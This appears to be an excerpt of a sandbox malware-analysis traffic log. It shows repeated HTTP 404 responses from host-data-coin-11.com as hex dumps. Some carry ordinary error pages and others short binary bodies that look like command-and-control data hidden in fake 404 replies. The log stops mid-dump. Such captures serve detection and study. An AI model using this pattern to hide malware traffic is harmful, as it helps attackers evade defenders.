                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Jan 2022 22:27:55 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 